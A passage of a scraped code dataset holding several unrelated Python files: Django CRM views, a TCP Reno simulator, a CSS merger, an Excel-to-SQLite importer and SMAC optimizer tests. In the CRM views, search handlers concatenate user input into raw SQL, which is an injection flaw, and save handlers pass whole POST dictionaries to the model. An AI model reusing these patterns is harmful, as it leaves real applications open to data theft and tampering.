self.wait()\n","sub_path":"algorithm-analysis-1/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"574801418","text":"import re\nimport time\nfrom django.http.response import HttpResponse\nimport json\n\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_POST\n\nfrom crm.models import Customer, Nation, CommunicationSituation,\\\n CustomerGrade, PaymentTerm, Religion, SourceOfCustomer, Category\nfrom crm.utils import exception_logger\n\n\n@require_POST\n@exception_logger\ndef customer_list(request):\n customer_grade = request.POST.get('customer_grade')\n search = request.POST.get('search')\n nation = request.POST.get('nation')\n include = request.POST.get('include')\n page = request.POST.get('page')\n rows = request.POST.get('rows')\n rows = int(rows)\n page = int(page)\n start = (page-1)*rows\n end = page*rows\n if search is not None:\n sql = 'select t1.id,t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source \\\n from customer t1 left join religion t2 on t1.religion = t2.id \\\n left join nation t3 on t1.nation = t3.id \\\n left join source_of_customer t4 on t1.source_of_customer = t4.id \\\n where 1=1'\n search = search.split(' ')\n for item in search:\n if include == '1':\n if item == 'history':\n sql += ' and history <> 0'\n continue\n sql += ' and concat(t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source) \\\n like \"%%'+item+'%%\"'\n else:\n if item == 'history':\n sql += ' and history = 0'\n continue\n sql += ' and concat(t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source) \\\n not like \"%%'+item+'%%\"'\n objs = Customer.objects.raw(sql + ' and t1.customer_grade <> 4 order by t1.receive_time desc')\n objs = [item for item in objs]\n total = len(objs)\n objs = objs[start:end]\n elif customer_grade is not None and customer_grade != 'all':\n total = Customer.objects.filter(customer_grade=int(customer_grade)).count()\n objs = Customer.objects.filter(customer_grade=int(customer_grade)).order_by('-sort')[start:end]\n elif nation is not None and customer_grade != 'all':\n total = Customer.objects.filter(nation=nation).exclude(customer_grade=4).count()\n objs = Customer.objects.filter(nation=nation).exclude(customer_grade=4).order_by('-sort')[start:end]\n else:\n total = Customer.objects.exclude(customer_grade=4).count()\n objs = Customer.objects.raw(\"select id,sort,name,company_name,nation,email,website,history from customer \\\n where customer_grade <> 4 order by receive_time desc,id desc\")[start:end]\n data = []\n for item in objs:\n temp = {}\n if item.customer_grade == 1:\n temp.__setitem__('grade', '')\n elif item.customer_grade == 2:\n temp.__setitem__('grade', '')\n elif item.customer_grade == 3:\n temp.__setitem__('grade', '')\n elif item.customer_grade == 4:\n temp.__setitem__('grade', '')\n else:\n temp.__setitem__('grade', '#')\n temp.__setitem__('id', item.id)\n temp.__setitem__('company_name', item.company_name)\n temp.__setitem__('name', item.name)\n temp.__setitem__('nation', Nation.objects.filter(id=item.nation).first().nation)\n regex = re.compile(r\"\\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,4}\\b\", re.IGNORECASE)\n mails = re.findall(regex, item.email)\n temp.__setitem__('email', mails)\n temp.__setitem__('website', item.website)\n temp.__setitem__('history', 
item.history)\n temp.__setitem__('create_time', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(item.create_time)))\n data.append(temp)\n return HttpResponse(json.dumps({'total': total, 'rows': data}, ensure_ascii=False))\n\n\n@exception_logger\ndef get_communication_situation(request):\n objs = CommunicationSituation.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.situation)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_customer_grade(request):\n objs = CustomerGrade.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.grade)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_customer_grade_filter(request):\n objs = CustomerGrade.objects.order_by('id').all()\n data = [{'id': 'all', 'text': '全部客户'}]\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.grade)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_payment_term(request):\n objs = PaymentTerm.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.term)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_religion(request):\n objs = Religion.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.religion)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_source_of_customer(request):\n objs = SourceOfCustomer.objects.order_by('id').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.source)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_nation(request):\n objs = Nation.objects.order_by('nation').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('text', item.nation)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@exception_logger\ndef get_product_category(request):\n objs = Category.objects.order_by('id').using('website').all()\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('category', item.category)\n data.append(temp)\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n\n\n@require_POST\n@exception_logger\ndef add_customer_settings_info(request):\n\n # {0:'customer_grade',1:'communication_situation',2:'source_of_customer',3:'religion',4:'payment_term',5:'nation'}\n\n data_type = request.POST.get('type')\n\n if data_type == '0':\n if CustomerGrade.objects.filter(grade__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n CustomerGrade.objects.create(grade=request.POST.get('data'))\n if data_type == '1':\n if CommunicationSituation.objects.filter(situation__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n CommunicationSituation.objects.create(situation=request.POST.get('data'))\n if data_type == '2':\n if 
SourceOfCustomer.objects.filter(source__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n SourceOfCustomer.objects.create(source=request.POST.get('data'))\n if data_type == '3':\n if Religion.objects.filter(religion__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n Religion.objects.create(religion=request.POST.get('data'))\n if data_type == '4':\n if PaymentTerm.objects.filter(term__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n PaymentTerm.objects.create(term=request.POST.get('data'))\n if data_type == '5':\n if Nation.objects.filter(nation__contains=request.POST.get('data')).first() is not None:\n return HttpResponse('repeat')\n else:\n Nation.objects.create(nation=request.POST.get('data'))\n return HttpResponse('done')\n\n\n@exception_logger\ndef add_customer(request):\n if request.method == 'GET':\n return render(request, 'add_customer.html')\n if request.method == 'POST':\n info = request.POST.dict()\n info['name'] = str(info['name']).upper()\n info['create_time'] = int(time.time())\n Customer.objects.create(**info)\n return HttpResponse('done')\n\n\n@require_POST\n@exception_logger\ndef save_customer(request):\n cid = request.POST.get('id')\n new_data = request.POST.dict()\n new_data['name'] = str(new_data['name']).upper()\n del new_data['id']\n Customer.objects.filter(id=int(cid)).update(**new_data)\n return HttpResponse('done')\n\n\n@require_POST\n@exception_logger\ndef customer_detail(request):\n print(request.POST.get('id'))\n if '@' in request.POST.get('id'):\n obj = Customer.objects.filter(email__icontains=request.POST.get('id')).first()\n else:\n obj = Customer.objects.filter(id=int(request.POST.get('id'))).first()\n if obj:\n data = {}\n for item in obj._meta.fields:\n data.__setitem__(item.name, eval('obj.'+item.name))\n return HttpResponse(json.dumps(data, ensure_ascii=False))\n else:\n return HttpResponse(json.dumps({'data': 'none'}, ensure_ascii=False))\n\n\n@require_POST\n@exception_logger\ndef customer_fast_search(request):\n search = request.POST.get('search')\n if search is not None:\n sql = 'select t1.id,t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source \\\n from customer t1 left join religion t2 on t1.religion = t2.id \\\n left join nation t3 on t1.nation = t3.id \\\n left join source_of_customer t4 on t1.source_of_customer = t4.id \\\n where t1.customer_grade <> 4 and 1=1'\n search = search.split(' ')\n for item in search:\n sql += ' and concat(t1.company_name,t1.name,t1.nation,t1.email,t1.website,t1.history,t2.religion,t3.nation,t4.source) \\\n like \"%%'+item+'%%\"'\n objs = Customer.objects.raw(sql + ' order by t1.sort desc')\n objs = [item for item in objs]\n total = len(objs)\n else:\n return HttpResponse('[]')\n data = []\n for item in objs:\n temp = {}\n temp.__setitem__('id', item.id)\n temp.__setitem__('company_name', item.company_name)\n temp.__setitem__('name', item.name)\n temp.__setitem__('nation', Nation.objects.filter(id=item.nation).first().nation)\n temp.__setitem__('email', item.email)\n temp.__setitem__('website', item.website)\n temp.__setitem__('sort', item.sort)\n temp.__setitem__('history', item.history)\n data.append(temp)\n return HttpResponse(json.dumps({'total': total, 'rows': data}, 
ensure_ascii=False))\n","sub_path":"crm/customer_views.py","file_name":"customer_views.py","file_ext":"py","file_size_in_byte":11418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137038408","text":"import globals\nimport math\n\nfrom host import Host\nfrom link import Link\nfrom packet import Packet\nfrom router import Router\n\nclass Flow:\n def __init__(self, id, source, destination, amount,\\\n start, track=True):\n '''\n The function initializes a flow object:\n Initial Arguments:\n - id (string) : id of the flow\n - source (string): id of the source of the flow\n - destination (string): id of the destination of the flow\n - amount (int): number of Megabytes to be sent\n - track (bool): used in determining if metrics should be tracked\n\n Attributes:\n - window_size (float) : size of the window used for sending packets\n - window_start (int) : packet number to start sending form\n - FR (int) : packet id of packet sent during fast recovery\n - rtt (float) : current round trip time\n - rto (float) : current timeout value\n - id (int) : id of the flow\n - source (Host/Router) : refers to source object of the flow\n - destination (Host/Router) : refers to the dest object of the flow\n - amount (int) : number of packets within the flow\n - start (float) : time the flow is scheduled to start\n - setRTT (bool) : determine if we have set an RTT yet\n - state (string) : determines what start the congestion control is in\n can take on values of \"slow_start\", \"congestion_avoidance\", \"fast_recovery\"\n - packets (List) : List of packets to be sent for the flow\n - done (bool) : flag to demonstrate if the flow has all been sent\n - ssthresh (int) : threshold for TCP Reno window size\n - send_times (dict) : dictionary of packet ids to send times of the packet\n contains only packets that have not yet been acked\n - dup_count (dict) : a dictionary of packet id and the number of times they\n have been sent, used to calculate the RTT using Karn's algo\n - duplicate_count (int) : number of consecutive duplicative acks received\n - duplicate_packet (int) : value of the duplicate acknowledgements\n - timeout_marker (float) : earliest time at which a packet has timed out\n - next_cut_time (float) : next time we can cut the window size, created to make sure\n we don't trigger a dangerous loop\n\n Variables for metric tracking:\n - track\n - frwindow\n - frsteps\n - rttwindow\n - rttsteps\n - added\n - successfullytransmitted\n - states_tracker : tracks the states the flow is in and when they switch.\n '''\n self.window_size = 1\n self.window_start = 0\n self.FR = -1\n\n self.rtt = 1\n self.rto = self.rtt\n self.id = id\n\n if source[0] == 'H':\n self.source = globals.idmapping['hosts'][source]\n else:\n self.source = globals.idmapping['routers'][source]\n if destination[0] == 'H':\n self.destination = globals.idmapping['hosts'][destination]\n else:\n self.destination = globals.idmapping['routers'][destination]\n\n # Converts the amount of data from Megabytes to bits\n self.amount = round((amount * 8 * globals.MEGABITSTOBITS) / (globals.PACKETSIZE - (20 * 8))) + 1\n\n # time at which the flow simulation starts, in s\n self.start = start\n\n self.setRTT = False\n self.state = \"slow_start\"\n # List of actual packets to be sent\n self.packets = []\n for i in range(self.amount):\n p = None\n p = Packet(self.source.id, self.id, self.destination.id, i, \\\n globals.STANDARDPACKET, '')\n self.packets.append(p)\n\n self.done = False\n self.ssthresh = 
1000\n\n self.send_times = dict()\n self.dup_count = dict()\n\n # congestion signals to keep track of\n self.duplicate_count = 0\n self.duplicate_packet = -2\n self.timeout_marker = 1000\n self.next_cut_time = 0\n\n # Variables for metric tracking\n self.track = track\n self.frwindow = 600 * globals.dt\n self.frsteps = []\n self.added = False\n self.successfullytransmitted = {}\n\n # If this flow is being tracked, we set up the dictionaries for all of\n # the metrics to be tracked.\n if (track):\n for m in globals.FLOWMETRICS:\n globals.statistics[id+\":\"+m] = {}\n # Tracking what states we are in and the time\n self.states_tracker = []\n\n\n\n # Run the flow, this is the function called every dt for the flow\n def run(self):\n # If we shouldn't do anything, leave\n if self.start >= globals.systime or self.done == True:\n return\n\n # Send any available packets otherwise\n self.send_packets()\n\n # Process an acknowledgement once received\n def process_ack(self, p):\n # If we've received the acknowledgment for the last packet\n if p.data >= self.amount:\n self.done = True\n # If we're done\n if self.done:\n return\n\n # Handle duplicate packets\n if p.data == self.duplicate_packet:\n self.handle_dup_ack(p)\n return\n\n # If we're in fast_recovery with a new packet, enter congestion_avoidance\n if self.state == 'fast_recovery':\n self.state = 'congestion_avoidance'\n self.states_tracker.append((self.state, globals.systime))\n\n self.duplicate_count = 0\n self.duplicate_packet = p.data\n self.window_start = p.data\n\n # If this is first successful transmission of packet, set new rtt & rto\n if self.dup_count[p.packetid] == 1:\n self.rtt = globals.systime - self.send_times[p.packetid]\n self.rto = 2 * self.rtt\n\n # This is a new ACK, update rto\n self.timeout_marker = globals.systime + self.rto\n\n # If it's the synack, start metrics\n if p.packetid == 0:\n self.start_metrics()\n return\n\n # If we hit the threshold, enter congestion avoidance\n if self.window_size >= self.ssthresh and self.state == 'slow_start':\n self.state = 'congestion_avoidance'\n self.states_tracker.append((self.state, globals.systime))\n\n # Slow start\n if self.state == 'slow_start':\n self.window_size += 1\n self.window_start = p.data\n\n\n # Congestion avoidance\n elif self.state == 'congestion_avoidance':\n self.window_size += 1 / self.window_size\n self.window_start = p.data\n\n\n # Time to do some metric tracking\n self.track_metrics(p)\n return\n\n # Handling duplicate acknowledgements depending on the state of TCP Reno\n def handle_dup_ack(self, p):\n self.duplicate_count += 1\n # Time to enter fast recovery\n if self.state != 'fast_recovery' and self.duplicate_count == 3 and \\\n self.next_cut_time <= globals.systime:\n self.ssthresh = max(self.window_size / 2, 2)\n # Retransmit the dropped packet\n self.source.send_packet(self.packets[p.data])\n self.dup_count[p.data] = self.dup_count[p.data] + 1\n self.window_size = self.ssthresh + 3\n self.state = 'fast_recovery'\n self.states_tracker.append((self.state, globals.systime))\n self.next_cut_time = globals.systime + self.rto\n\n # Window inflation\n elif self.state == 'fast_recovery':\n # Send any packets we can send\n self.send_packets()\n\n # Sends the packets depending on the time and acks we've received\n def send_packets(self):\n # if we have timed out (not recently)\n if globals.systime >= self.timeout_marker and \\\n globals.systime >= self.next_cut_time:\n print(\"timed out at time: \", globals.systime, \"window size: \", self.window_size)\n # Enter 
slow_start\n self.ssthresh = max(self.window_size / 2, 2)\n self.window_size = 1\n\n # Update state and track timeout\n self.state = 'slow_start'\n self.next_cut_time = globals.systime + self.rto\n self.states_tracker.append((self.state, globals.systime))\n\n # Retransmit timed out packet and update send times and\n # dup_count\n self.source.send_packet(self.packets[self.window_start])\n self.send_times[self.window_start] = globals.systime\n self.dup_count[self.window_start] += 1\n\n # Clear out the send times for all the packets larger than\n # the current packet\n send_times_keys_copy = list(self.send_times.keys()).copy()\n for i in send_times_keys_copy:\n if i > self.window_start:\n del self.send_times[i]\n\n # Double timeout time\n self.rto = 2 * self.rto\n self.next_cut_time += self.rto\n\n elif self.state != \"fast_recovery\":\n # Send everything in the window that has not been sent\n self.send_window()\n\n # Send a window of packets if it has not been sent\n def send_window(self):\n # Send everything in the window that has not been sent\n for i in range(self.window_start, min(round(self.window_start + \\\n self.window_size), self.amount)):\n if i not in self.send_times.keys():\n # update duplicate counter\n if i not in self.dup_count.keys():\n self.dup_count[i] = 1\n else:\n self.dup_count[i] += 1\n\n # update the sent time\n self.send_times[i] = globals.systime\n\n # send the packet\n self.source.send_packet(self.packets[i])\n\n # Initialize info to start tracking metrics for the flow\n def start_metrics(self):\n self.setRTT = True\n if (self.track):\n key = self.id + \":\" + globals.FLOWRTT\n globals.statistics[key][globals.systime] = self.rtt\n return\n\n # Track the metrics on the flow\n def track_metrics(self, p):\n if self.track and (not self.done) and \\\n p.packetid not in self.successfullytransmitted.keys():\n self.successfullytransmitted[p.packetid] = 1\n self.frsteps.append(globals.PACKETSIZE)\n self.added = True\n assert globals.systime >= self.start\n\n\n # Update the flow statistics for metric tracking\n def update_flow_statistics(self):\n if self.track and (not self.done) and globals.systime >= self.start:\n # Flow Rate\n rate = 0\n if (not self.added):\n self.frsteps.append(0)\n if (len(self.frsteps) <= self.frwindow/globals.dt):\n rate = sum(self.frsteps)/(globals.systime - self.start)\n else:\n self.frsteps.pop(0)\n rate = sum(self.frsteps)/(self.frwindow)\n key = self.id + \":\" + globals.FLOWRATE\n globals.statistics[key][globals.systime] = rate\n\n # Window size\n key = self.id + \":\" + globals.WINDOWSIZE\n globals.statistics[key][globals.systime] = self.window_size\n\n # RTT\n if (self.setRTT):\n key = self.id + \":\" + globals.FLOWRTT\n globals.statistics[key][globals.systime] = self.rtt\n\n self.added = False\n\n # Function to determine if the flow has completed or not\n def completed(self):\n return self.done\n","sub_path":"flow_reno.py","file_name":"flow_reno.py","file_ext":"py","file_size_in_byte":11766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"459554394","text":"# -*- coding: utf-8 -\n#\n# This file is part of friendpaste released under Apache License, Version 2.0. 
\n# See the NOTICE for more information.\n\nimport re\nimport os\n\nfrom yaml import load, dump\ntry:\n from yaml import CLoader as Loader\n from yaml import CDumper as Dumper\nexcept ImportError:\n from yaml import Loader, Dumper\n \nfrom css_parser import CSSParser\n\nre_url = re.compile('url\\s*\\(([^\\s\"].*)\\)')\n\ndef read_file(fname):\n f = open(fname, 'r')\n data = f.read()\n f.close()\n return data\n\nclass MergeCSS(object):\n def __init__(self, confile):\n confdata = ''\n try:\n confdata = read_file(confile)\n except:\n pass\n \n self.conf = load(confdata, Loader=Loader)\n self.path = self.conf['css_path']\n self.src_path = \"%s/src\" % self.path\n \n def replace_url(self, mo):\n if mo.group(0).startswith('url(../'):\n return \"%s%s\" % (mo.group(0)[0:4], mo.group(0)[7:])\n \n def run(self):\n for fname, src_files in self.conf['css'].iteritems():\n output_css = ''\n for src_fname in src_files:\n src_fpath = os.path.join(self.src_path, src_fname)\n if os.path.exists(src_fpath):\n output_css += str(CSSParser(read_file(src_fpath)))\n \n output_css = re_url.sub(self.replace_url, output_css)\n \n dest_path = os.path.join(self.path, fname)\n f = open(dest_path, 'w')\n f.write(output_css)\n","sub_path":"tools/merge_css.py","file_name":"merge_css.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"637344993","text":"# -*- coding: UTF-8 -*-\n\nimport sqlite3\nimport openpyxl\nimport re\nimport datetime\nimport os\n\n\nclass ExcelToSQL(object):\n\n def __init__(self, filename):\n\n self.filename = filename\n\n wb = openpyxl.load_workbook(filename)\n sheets = wb.get_sheet_names()\n ws = wb[sheets[0]]\n\n database_file = self.making_db()\n database_name = self.signs_replacer(str(sheets[0]))\n\n col_name = []\n names = 'CREATE TABLE IF NOT EXISTS ' + database_name + ' (ID INTEGER PRIMARY KEY AUTOINCREMENT'\n col_names = list(ws.rows)\n for cell in col_names[0]:\n names += ', ' + str(self.signs_replacer(cell.value)) + ' TEXT'\n col_name.append(self.signs_replacer(cell.value))\n names += ');'\n\n database_file.execute(names)\n\n tup = []\n for i, rows in enumerate(ws):\n tuprow = []\n if i == 0:\n continue\n for row in rows:\n new_row = str(row.value).replace('\\n', ' ')\n tuprow.append(new_row.strip()) if new_row.strip() != 'None' else tuprow.append('')\n tup.append(tuple(tuprow))\n\n insQuery1 = 'INSERT INTO ' + database_name + ' ('\n insQuery2 = ''\n for col in col_name:\n insQuery1 += col + ', '\n insQuery2 += '?, '\n\n insQuery1 = insQuery1[:-2] + ') VALUES('\n insQuery2 = insQuery2[:-2] + ')'\n insQuery = insQuery1 + insQuery2\n\n database_file.executemany(insQuery, tup)\n\n database_file.commit()\n\n def making_db(self):\n \"\"\"\n Creates the database file on disk; if the file already exists, a backup copy of it is made first.\n :return: an sqlite connection to the database\n \"\"\"\n date = datetime.date.today()\n db_name = str(date) + '.db'\n db_backup = db_name + \".bak\"\n file = r\"C:\\Users\\mateusz.sobek\\Desktop\\Rozwoj\\python\\projects\\cop\" + \"\\\\\" + db_name\n file_bak = r\"C:\\Users\\mateusz.sobek\\Desktop\\Rozwoj\\python\\projects\\cop\" + \"\\\\\" + db_backup\n if os.path.isfile(file):\n if os.path.isfile(file_bak):\n os.remove(file_bak)\n os.rename(file, file_bak)\n tableexport_db = sqlite3.connect(db_name)\n else:\n tableexport_db = sqlite3.connect(db_name)\n return tableexport_db\n\n def signs_replacer(self, text):\n \"\"\"\n Removes all punctuation characters from the text and replaces whitespace with underscores.\n :param text: text to transform\n :return: transformed text\n \"\"\"\n self.text = text\n\n # Remove all non-word characters (everything except numbers and letters)\n text = re.sub(r\"[^\\w\\s]\", '', text)\n # Replace all runs of whitespace with a single underscore\n text = re.sub(r\"\\s+\", '_', text)\n return text\n","sub_path":"exceltosql.py","file_name":"exceltosql.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"534691532","text":"# -*- coding:utf-8 -*-\r\n'''\r\nCreated on 2014-09-01\r\n\r\n@author: liuyc\r\n'''\r\nfrom django.contrib.contenttypes.models import ContentType\r\nfrom core.layout.shortcuts import menu_render_to_response,csrf_protect\r\nfrom core.conf.models import can_distribute\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\nfrom cmdb.manager import ___resource___\r\ndef global_settings_manager(request):\r\n \r\n return\r\n\r\n\r\ndef auth_ldap_manager(request):\r\n \"\"\"\r\n \r\n \"\"\"\r\n \r\n\r\n\r\nactions = ((\"删除资源\",\"delete\"),(\"资源指派\",\"distribute\"),(\"可指派管理\",\"manager\",))\r\n@csrf_protect\r\n@login_required(login_url=\"/\")\r\n\r\ndef entity_domain_relation_distribute(request,method=\"distribute\",template=\"conf/entity_distribute.html\"):\r\n \"\"\"\r\n Manage which entity types can be distributed to the next domain.\r\n \"\"\"\r\n\r\n \r\n context_dict = dict(path=\"/background/config/entity/distribute/\",\r\n act=method,actions=actions)\r\n \r\n \r\n items = []\r\n if request.method == \"POST\":\r\n \r\n items = request.POST.getlist(\"item\")\r\n \r\n if method == \"distribute\":\r\n context_dict['items'] = ContentType.objects.filter(can_distribute__can=True)\r\n if items :\r\n can_distribute.objects.filter(content_type__id__in=items).update(dis=True)\r\n \r\n elif method == \"manager\":\r\n context_dict['items'] = ContentType.objects.filter(model__in=___resource___,\r\n app_label=\"cmdb\",can_distribute__can=None)\r\n if items :\r\n for item in ContentType.objects.filter(id__in=items):\r\n can_distribute.objects.get_or_create(content_type=item,can=True)\r\n else :\r\n context_dict['items'] = ContentType.objects.filter(can_distribute__can=True)\r\n if items :\r\n can_distribute.objects.filter(content_type__id__in=items).delete()\r\n\r\n return menu_render_to_response(request,\r\n \"conf-entity-distribute\",\"background\",template,context_dict)","sub_path":"core/conf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"528800910","text":"import os\nimport sys\nimport unittest\nimport shutil\nimport glob\nimport re\n\nimport numpy as np\nfrom ConfigSpace import ConfigurationSpace, Configuration\n\nfrom smac.epm.rf_with_instances import RandomForestWithInstances\nfrom smac.epm.uncorrelated_mo_rf_with_instances import \\\n UncorrelatedMultiObjectiveRandomForestWithInstances\nfrom smac.facade.smac_facade import SMAC\nfrom smac.initial_design.single_config_initial_design import SingleConfigInitialDesign\nfrom smac.intensification.intensification import Intensifier\nfrom smac.optimizer.acquisition import EI, EIPS, LogEI\nfrom smac.optimizer.local_search import LocalSearch\nfrom smac.optimizer.objective import average_cost\nfrom smac.optimizer.smbo import SMBO\nfrom smac.runhistory.runhistory import RunHistory\nfrom smac.runhistory.runhistory2epm import RunHistory2EPM4Cost, 
\\\n RunHistory2EPM4LogCost, RunHistory2EPM4EIPS\nfrom smac.scenario.scenario import Scenario\nfrom smac.stats.stats import Stats\nfrom smac.tae.execute_func import ExecuteTAFuncArray\nfrom smac.tae.execute_ta_run import TAEAbortException, FirstRunCrashedException\nfrom smac.utils import test_helpers\nfrom smac.utils.util_funcs import get_types\n\nif sys.version_info[0] == 2:\n import mock\nelse:\n from unittest import mock\n\n\nclass ConfigurationMock(object):\n def __init__(self, value=None):\n self.value = value\n\n def get_array(self):\n return [self.value]\n\n\nclass TestSMBO(unittest.TestCase):\n\n def setUp(self):\n self.scenario = Scenario({'cs': test_helpers.get_branin_config_space(),\n 'run_obj': 'quality',\n 'output_dir': ''})\n\n def branin(self, x):\n y = (x[:, 1] - (5.1 / (4 * np.pi ** 2)) * x[:, 0] ** 2 + 5 * x[:, 0] / np.pi - 6) ** 2\n y += 10 * (1 - 1 / (8 * np.pi)) * np.cos(x[:, 0]) + 10\n\n return y[:, np.newaxis]\n\n def test_init_only_scenario_runtime(self):\n self.scenario.run_obj = 'runtime'\n self.scenario.cutoff = 300\n smbo = SMAC(self.scenario).solver\n self.assertIsInstance(smbo.model, RandomForestWithInstances)\n self.assertIsInstance(smbo.rh2EPM, RunHistory2EPM4LogCost)\n self.assertIsInstance(smbo.acquisition_func, LogEI)\n\n def test_init_only_scenario_quality(self):\n smbo = SMAC(self.scenario).solver\n self.assertIsInstance(smbo.model, RandomForestWithInstances)\n self.assertIsInstance(smbo.rh2EPM, RunHistory2EPM4Cost)\n self.assertIsInstance(smbo.acquisition_func, EI)\n\n def test_init_EIPS_as_arguments(self):\n for objective in ['runtime', 'quality']:\n self.scenario.run_obj = objective\n types, bounds = get_types(self.scenario.cs, None)\n umrfwi = UncorrelatedMultiObjectiveRandomForestWithInstances(\n ['cost', 'runtime'], types, bounds)\n eips = EIPS(umrfwi)\n rh2EPM = RunHistory2EPM4EIPS(self.scenario, 2)\n smbo = SMAC(self.scenario, model=umrfwi, acquisition_function=eips,\n runhistory2epm=rh2EPM).solver\n self.assertIs(umrfwi, smbo.model)\n self.assertIs(eips, smbo.acquisition_func)\n self.assertIs(rh2EPM, smbo.rh2EPM)\n\n def test_rng(self):\n smbo = SMAC(self.scenario, rng=None).solver\n self.assertIsInstance(smbo.rng, np.random.RandomState)\n self.assertIsInstance(smbo.num_run, int)\n smbo = SMAC(self.scenario, rng=1).solver\n rng = np.random.RandomState(1)\n self.assertEqual(smbo.num_run, 1)\n self.assertIsInstance(smbo.rng, np.random.RandomState)\n smbo = SMAC(self.scenario, rng=rng).solver\n self.assertIsInstance(smbo.num_run, int)\n self.assertIs(smbo.rng, rng)\n # ML: I don't understand the following line and it throws an error\n self.assertRaisesRegexp(TypeError,\n \"Unknown type <(class|type) 'str'> for argument \"\n 'rng. 
Only accepts None, int or '\n 'np.random.RandomState',\n SMAC, self.scenario, rng='BLA')\n\n def test_choose_next(self):\n seed = 42\n smbo = SMAC(self.scenario, rng=seed).solver\n smbo.runhistory = RunHistory(aggregate_func=average_cost)\n X = self.scenario.cs.sample_configuration().get_array()[None, :]\n smbo.incumbent = self.scenario.cs.sample_configuration()\n smbo.runhistory.add(smbo.incumbent, 10, 10, 1)\n\n Y = self.branin(X)\n x = next(smbo.choose_next(X, Y)).get_array()\n assert x.shape == (2,)\n \n def test_choose_next_w_empty_rh(self):\n seed = 42\n smbo = SMAC(self.scenario, rng=seed).solver\n smbo.runhistory = RunHistory(aggregate_func=average_cost)\n X = self.scenario.cs.sample_configuration().get_array()[None, :]\n\n Y = self.branin(X)\n self.assertRaises(ValueError, smbo.choose_next, **{\"X\":X, \"Y\":Y})\n\n x = next(smbo.choose_next(X, Y, incumbent_value=0.0)).get_array() \n assert x.shape == (2,)\n\n def test_choose_next_2(self):\n def side_effect(X):\n return np.mean(X, axis=1).reshape((-1, 1))\n\n smbo = SMAC(self.scenario, rng=1).solver\n smbo.incumbent = self.scenario.cs.sample_configuration()\n smbo.runhistory = RunHistory(aggregate_func=average_cost)\n smbo.runhistory.add(smbo.incumbent, 10, 10, 1)\n smbo.model = mock.Mock(spec=RandomForestWithInstances)\n smbo.acquisition_func._compute = mock.Mock(spec=RandomForestWithInstances)\n smbo.acquisition_func._compute.side_effect = side_effect\n\n X = smbo.rng.rand(10, 2)\n Y = smbo.rng.rand(10, 1)\n\n challengers = smbo.choose_next(X, Y)\n x = [c for c in challengers]\n\n self.assertEqual(smbo.model.train.call_count, 1)\n\n self.assertEqual(len(x), 2002)\n num_random_search = 0\n num_local_search = 0\n for i in range(0, 2002, 2):\n # print(x[i].origin)\n self.assertIsInstance(x[i], Configuration)\n if 'Random Search (sorted)' in x[i].origin:\n num_random_search += 1\n elif 'Local Search' in x[i].origin:\n num_local_search += 1\n # number of local search configs has to be least 10\n # since x can have duplicates\n # which can be associated with the local search\n self.assertGreaterEqual(num_local_search, 1)\n for i in range(1, 2002, 2):\n self.assertIsInstance(x[i], Configuration)\n self.assertEqual(x[i].origin, 'Random Search')\n\n def test_choose_next_3(self):\n def side_effect(X):\n return np.mean(X, axis=1).reshape((-1, 1))\n\n smbo = SMAC(self.scenario, rng=1).solver\n smbo.incumbent = self.scenario.cs.sample_configuration()\n previous_configs = [smbo.incumbent] + [self.scenario.cs.sample_configuration() for i in 